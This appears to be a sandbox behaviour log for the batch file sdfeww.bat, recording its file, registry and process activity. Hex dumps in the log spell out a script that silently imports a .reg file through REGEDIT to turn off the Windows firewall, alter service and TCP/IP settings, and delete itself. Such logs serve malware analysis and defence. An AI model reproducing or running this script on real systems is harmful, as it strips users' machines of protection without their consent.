C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 57 32 4B 4C 70 6B 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 30 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 54 63 70 69 70 5C 50 61 72 61 6D 65 74 65 72	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 54 63 70 69 70 5C 50 61 72 61 6D 65 74 65 72 73 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 4D 61 78 46 72 65 65 54 63 62 73 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 37 64 30 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 4D 61 78 48 61 73 68 54 61 62 6C 65 53 69 7A 65 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 38 30 30 3E 3E 25 74 65 6D 70 25 5C	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 4D 61 78 48 61 73 68 54 61 62 6C 65 53 69 7A 65 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 38 30 30 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 54 63 70 54 69 6D 65 64 57 61 69 74 44 65 6C 61 79 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 31 65 3E 3E 25	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 54 63 70 54 69 6D 65 64 57 61 69 74 44 65 6C 61 79 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 31 65 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 4D 61 78 55 73 65 72 50 6F 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 66 36 31 38 3E 3E 25 74 65 6D 70 25	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 4D 61 78 55 73 65 72 50 6F 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 66 36 31 38 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 53 54 41 52 54 20 2F 57 41 49 54 20 52 45 47 45 44 49 54 20 2F 53	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 53 54 41 52 54 20 2F 57 41 49 54 20 52 45 47 45 44 49 54 20 2F 53 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 54 20 2F 53	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	53 54 41 52 54 20 2F 57 41 49 54 20 52 45 47 45 44 49 54 20 2F 53 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 54 20 2F 53	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	44 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 37 36 38 34 64 2E 72 65 67 0D 0A 00 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 54 20 2F 53	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	44 45 4C 20 25 30 0D 0A 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 00 45 4C 20 25 30 0D 0A 37 36 38 34 64 2E 72 65 67 0D 0A 00 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 54 20 2F 53	success or wait	1	4AD069F8

Other file operations
File Path	Disposition	Data	Ascii Data	Completion	Count	Source Address
C:\sdfeww.bat	PositionInformation	Offset: 0		success or wait	134	4AD069B5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	PositionInformation	Offset: 9		success or wait	22	4AD0E066

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	260000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	280000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	2D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	320000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	340000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	420000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\sdfeww.bat	query and read	commit	860000	4096	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\BaseNamedObjects\ShimSharedMemory	write	image	870000	57344	own pid	read write	success or wait	1	4AD0998F
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	880000	126976	own pid	execute	success or wait	1	4AD0998F
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1	4AD0998F
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	880000	1208320	own pid	readonly	success or wait	1	4AD0998F
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1	4AD0998F
C:\WINDOWS\regedit.exe	write and read and execute	commit	9B0000	147456	own pid	execute	success or wait	2	4AD0998F
C:\WINDOWS\regedit.exe	query and read	commit	9B0000	147456	own pid	readonly	success or wait	2	4AD0998F
C:\WINDOWS\regedit.exe	query and read	commit	880000	147456	own pid	readonly	success or wait	1	4AD0998F

Registry Activities:

Key value queried
Key Path	Name	Completion	Count	Source Address
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	DisableUNCCheck	object name not found	2	4AD04A2A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	EnableExtensions	success or wait	2	4AD04A4F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	DelayedExpansion	object name not found	2	4AD04A88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	DefaultColor	success or wait	2	4AD04AAD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	CompletionChar	success or wait	1	4AD04AE5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	PathCompletionChar	success or wait	1	4AD04B37
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	AutoRun	success or wait	1	4AD04BB8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	CompletionChar	success or wait	1	4AD04AE5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	PathCompletionChar	object name not found	1	4AD04B37
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	AutoRun	object name not found	1	4AD04BB8

Process Activities:

Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
1456	C:\WINDOWS\regedit.exe	REGEDIT /S C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	suspended	success or wait	1	4AD0998F

Memory Activities:

Memory allocated
PID	Filepath	Base	Length	Protection	Completion	Count	Source Address
1188	C:\WINDOWS\system32\cmd.exe	850000	12FE10	page read and write	success or wait	1	4AD04578

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1589229104
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 260000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1589245105
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 280000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1589246534
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 2D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1589250938
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1589251403
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1589260108
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1589271790
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1589272623
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 340000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1589289145
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 420000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1589298574
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 420000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1589303437
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1589307716
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1589308492
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1589313813
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1589321450
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DisableUNCCheck	object name not found	1589355935
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: EnableExtensions	success or wait	1589356238
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DelayedExpansion	object name not found	1589356510
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DefaultColor	success or wait	1589356780
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: CompletionChar	success or wait	1589357049
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: PathCompletionChar	success or wait	1589357767
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: AutoRun	success or wait	1589360248
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DisableUNCCheck	object name not found	1589360610
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: EnableExtensions	success or wait	1589360916
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DelayedExpansion	object name not found	1589361185
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DefaultColor	success or wait	1589361519
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: CompletionChar	success or wait	1589362024
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: PathCompletionChar	object name not found	1589364568
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: AutoRun	object name not found	1589364847
Memory allocated	PID: 1188 Path: C:\WINDOWS\system32\cmd.exe Base: 850000 Length: 12FE10 Allocation Type: null Protection: page read and write	success or wait	1589367495
File opened	Path: c:\ Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident	success or wait	1589375415
File opened	Path: c:\ Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident	success or wait	1589377300
Section loaded	Path: C:\sdfeww.bat Access: query and read Type: commit Baseaddress: 860000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1589423139
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589445796
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589445995
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 40 65 63 68 6F 20 6F 66 66 0D 0A 45 63 68 6F 20 52 45 47 45 44 49 54 34 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D	success or wait	1589446175
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589455883
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589456092
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589456400
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589464122
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589464298
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 52 45 47 45 44 49 54 34 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E	success or wait	1589464477
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589469205
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589470833
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589475018
File created	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1589475471
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 10 Value: 52 45 47 45 44 49 54 34 0D 0A	success or wait	1589497583
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589507765
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589514805
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 3E 3E	success or wait	1589514985
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589519411
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589519629
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589519861
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1589557989
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1589558741
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1589558939
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 2 Value: 0D 0A	success or wait	1589563296
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589568726
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589573687
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 53	success or wait	1589579000
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589584012
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589584262
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589584531
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1589585060
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1589586524
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1589589021
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 70 Value: 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 0D 0A	success or wait	1589589533
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589597051
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589597255
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 32 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59	success or wait	1589597457
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589603035
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589603273
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589605467
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1589609006
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1589609814
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1589610012
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 24 Value: 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 32 0D 0A	success or wait	1589610657
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589617657
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589617835
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5C 50 61	success or wait	1589618012
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589622499
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589624884
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589625104
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1589637391
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1589638062
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1589642326
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 2 Value: 0D 0A	success or wait	1589642944
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589647656
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589650923
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5C 50 61 72 61 6D 65 74 65 72 73 5C 46 69 72 65 77 61 6C 6C 50 6F 6C 69 63 79 5C 53	success or wait	1589651101
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589657368
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589657582
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589657798
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1589664535
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1589665261
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1589665435
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 112 Value: 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5C 50 61 72 61 6D 65 74 65 72 73 5C 46 69 72 65 77 61 6C 6C 50 6F 6C 69 63 79 5C 53 74 61 6E 64 61	success or wait	1589665962
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589672886
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589673062
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 45 6E 61 62 6C 65 46 69 72 65 77 61 6C 6C 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 30 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D	success or wait	1589673240
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589677687
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589678092
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589681456
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1589681944
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1589682592
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1589682764
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 33 Value: 22 45 6E 61 62 6C 65 46 69 72 65 77 61 6C 6C 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 30 0D 0A	success or wait	1589683251
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589689467
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589689641
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 77 75 61 75 73 65 72 76 5D 3E 3E 25 74 65 6D	success or wait	1589689818
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589697466
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589697675
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1589697874
